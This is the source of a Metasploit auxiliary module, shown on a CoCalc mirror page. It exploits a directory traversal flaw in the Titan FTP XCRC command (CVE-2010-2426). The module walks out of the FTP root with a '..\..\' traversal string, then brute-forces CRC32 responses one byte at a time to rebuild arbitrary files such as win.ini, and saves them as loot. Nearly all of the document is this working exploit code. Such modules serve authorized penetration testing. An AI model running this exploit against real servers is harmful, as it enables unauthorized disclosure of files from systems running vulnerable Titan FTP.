Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Ftp
8
include Msf::Auxiliary::Report
9
include Msf::Auxiliary::Scanner
10
11
def proto
12
'ftp'
13
end
14
15
def initialize
16
super(
17
'Name' => 'Titan FTP XCRC Directory Traversal Information Disclosure',
18
'Description' => %q{
19
This module exploits a directory traversal vulnerability in the XCRC command
20
implemented in versions of Titan FTP up to and including 8.10.1125. By making
21
sending multiple XCRC command, it is possible to disclose the contents of any
22
file on the drive with a simple CRC "brute force" attack.
23
24
Although the daemon runs with SYSTEM privileges, access is limited to files
25
that reside on the same drive as the FTP server's root directory.
26
},
27
'Author' => [
28
'jduck',
29
'Brandon McCann @zeknox <bmccann[at]accuvant.com>',
30
],
31
'License' => MSF_LICENSE,
32
'References' => [
33
[ 'CVE', '2010-2426' ],
34
[ 'OSVDB', '65533'],
35
[ 'URL', 'https://seclists.org/bugtraq/2010/Jun/160' ]
36
],
37
'DisclosureDate' => 'Jun 15 2010'
38
)
39
40
register_options(
41
[
42
Opt::RPORT(21),
43
OptString.new('TRAVERSAL', [ true, "String to traverse to the drive's root directory", "..\\..\\" ]),
44
OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'windows\\win.ini'])
45
]
46
)
47
end
48
49
def run_host(ip)
50
c = connect_login
51
return if not c
52
53
path = datastore['TRAVERSAL'] + datastore['PATH']
54
55
res = send_cmd(['XCRC', path, "0", "9999999999"], true)
56
if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)
57
print_error("Unable to obtain file size! File probably doesn't exist.")
58
return
59
end
60
file_size = $1.to_i
61
62
update_interval = 1.5
63
last_update = Time.now - update_interval
64
65
old_crc = 0
66
file_data = ''
67
file_size.times { |off|
68
res = send_cmd(['XCRC', path, "0", (off + 1).to_s], true)
69
if not (res =~ /250 (.*)\r?\n/)
70
raise RuntimeError, "Unable to obtain XCRC of byte #{off}!"
71
end
72
73
crc = $1.to_i(16)
74
if (crc == 0)
75
raise RuntimeError, "Unable to decode CRC: #{$1}"
76
end
77
78
ch = char_from_crc(crc, old_crc)
79
if not (ch)
80
raise RuntimeError, ("Unable to find a CRC match for 0x%x" % crc)
81
end
82
83
# got this byte ;)
84
file_data << ch
85
old_crc = crc
86
87
if (Time.now - last_update) >= update_interval
88
progress(file_size, off)
89
last_update = Time.now
90
end
91
}
92
93
progress(file_size, file_size)
94
95
fname = datastore['PATH'].gsub(/[\/\\]/, '_')
96
p = store_loot("titanftp.traversal", "text/plain", ip, file_data, fname)
97
print_good("Saved in: #{p}")
98
vprint_status(file_data.inspect)
99
100
disconnect
101
end
102
103
#
104
# Return a character code from the crc, or nil on failure
105
#
106
def char_from_crc(crc, old_crc)
107
256.times { |x|
108
ch = x.chr
109
if (Zlib.crc32(ch, old_crc) == crc)
110
return ch
111
end
112
}
113
nil
114
end
115
116
def progress(total, current)
117
done = (current.to_f / total.to_f) * 100
118
percent = "%3.2f%%" % done.to_f
119
print_status("Obtaining file contents - %7s done (%d/%d bytes)" % [percent, current, total])
120
end
121
end
122
123